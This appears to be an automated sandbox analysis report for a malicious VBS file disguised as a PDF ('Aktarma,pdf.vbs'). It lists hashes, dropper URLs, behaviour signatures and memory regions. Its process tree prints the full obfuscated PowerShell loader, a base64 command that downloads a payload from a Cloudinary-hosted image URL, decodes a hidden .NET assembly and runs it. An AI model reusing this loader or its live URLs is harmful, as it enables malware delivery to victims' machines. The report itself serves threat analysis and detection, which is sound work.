Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    09-12-2024 15:27

General

  • Target

    Aktarma,pdf.vbs

  • Size

    150KB

  • MD5

    8c5cf018a9128cb2a9267ee3c4183a0c

  • SHA1

    c0e11113ae0360e55302ceecbc7a356ed732ca18

  • SHA256

    d3307a065f67a642d7425c6b9774b6a145a786d64997b977deb151c03e0caf7e

  • SHA512

    7a826b11dc1fb0ca727ac5044a620b3db4108994bb4cdd353abfa6abdb9e598523d560a191fb1e42473c803a628f7052914d1c9124f09bbfe5fcdbf6154e5ada

  • SSDEEP

    3072:NqHoOtSIAMD8oV8luoi9TKq/do5DvqHoOtSIAMD8oV8luoi9TKq/do50qHoOtSI2:NqpTD8LRiJKq/e57qpTD8LRiJKq/e50x

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg

exe.dropper

https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Aktarma,pdf.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2076
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $hamminesses = 'JGxpdGVyYWxpdHkgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcnOyRob2VjYWtlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY29nbm9tZW5zID0gJGhvZWNha2UuRG93bmxvYWREYXRhKCRsaXRlcmFsaXR5KTskY2FyYmFuaW9uID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGNvZ25vbWVucyk7JHRlbGVwaG9uaWNhbGx5ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRleGNsdXNvcnkgPSAnPDxCQVNFNjRfRU5EPj4nOyRzY29vcCA9ICRjYXJiYW5pb24uSW5kZXhPZigkdGVsZXBob25pY2FsbHkpOyRib3dsZWdnZWQgPSAkY2FyYmFuaW9uLkluZGV4T2YoJGV4Y2x1c29yeSk7JHNjb29wIC1nZSAwIC1hbmQgJGJvd2xlZ2dlZCAtZ3QgJHNjb29wOyRzY29vcCArPSAkdGVsZXBob25pY2FsbHkuTGVuZ3RoOyRiZXdoaXNrZXJlZCA9ICRib3dsZWdnZWQgLSAkc2Nvb3A7JGZlc3Rvb25lcnkgPSAkY2FyYmFuaW9uLlN1YnN0cmluZygkc2Nvb3AsICRiZXdoaXNrZXJlZCk7JHByb3RldXNlcyA9IC1qb2luICgkZmVzdG9vbmVyeS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZmVzdG9vbmVyeS5MZW5ndGgpXTskZWxlbWlzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkcHJvdGV1c2VzKTskc3BvcmFkaWMgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRlbGVtaXMpOyRkdXBwaW5nID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGR1cHBpbmcuSW52b2tlKCRudWxsLCBAKCcwL24xQ1pUL3IvZWUuZXRzYXAvLzpzcHR0aCcsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICdNU0J1aWxkJywgJyRzY2hlZHVsZXJzJywnJHNjaGVkdWxlcnMnLCckc2NoZWR1bGVycycsJ1VSTCcsICdDOlxQcm9ncmFtRGF0YVwnLCdjbGFzc2VycycsJ3ZicycsJzEnLCcxJykpOw==';$stickhandled = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($hamminesses));Invoke-Expression $stickhandled
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2632

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Cab5B1D.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\Tar5B20.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • memory/2632-8-0x000007FEF56F0000-0x000007FEF608D000-memory.dmp

    Filesize

    9.6MB

  • memory/2632-5-0x000000001B6A0000-0x000000001B982000-memory.dmp

    Filesize

    2.9MB

  • memory/2632-4-0x000007FEF59AE000-0x000007FEF59AF000-memory.dmp

    Filesize

    4KB

  • memory/2632-9-0x000007FEF56F0000-0x000007FEF608D000-memory.dmp

    Filesize

    9.6MB

  • memory/2632-10-0x000007FEF56F0000-0x000007FEF608D000-memory.dmp

    Filesize

    9.6MB

  • memory/2632-11-0x000007FEF56F0000-0x000007FEF608D000-memory.dmp

    Filesize

    9.6MB

  • memory/2632-7-0x000007FEF56F0000-0x000007FEF608D000-memory.dmp

    Filesize

    9.6MB

  • memory/2632-6-0x0000000000660000-0x0000000000668000-memory.dmp

    Filesize

    32KB

  • memory/2632-46-0x000007FEF59AE000-0x000007FEF59AF000-memory.dmp

    Filesize

    4KB

  • memory/2632-47-0x000007FEF56F0000-0x000007FEF608D000-memory.dmp

    Filesize

    9.6MB

  • memory/2632-48-0x000007FEF56F0000-0x000007FEF608D000-memory.dmp

    Filesize

    9.6MB

  • memory/2632-50-0x000007FEF56F0000-0x000007FEF608D000-memory.dmp

    Filesize

    9.6MB

  • memory/2632-49-0x000007FEF56F0000-0x000007FEF608D000-memory.dmp

    Filesize

    9.6MB

  • memory/2632-51-0x000007FEF56F0000-0x000007FEF608D000-memory.dmp

    Filesize

    9.6MB

  • memory/2632-53-0x000000001AD00000-0x000000001AE58000-memory.dmp

    Filesize

    1.3MB

  • memory/2632-54-0x000007FEF56F0000-0x000007FEF608D000-memory.dmp

    Filesize

    9.6MB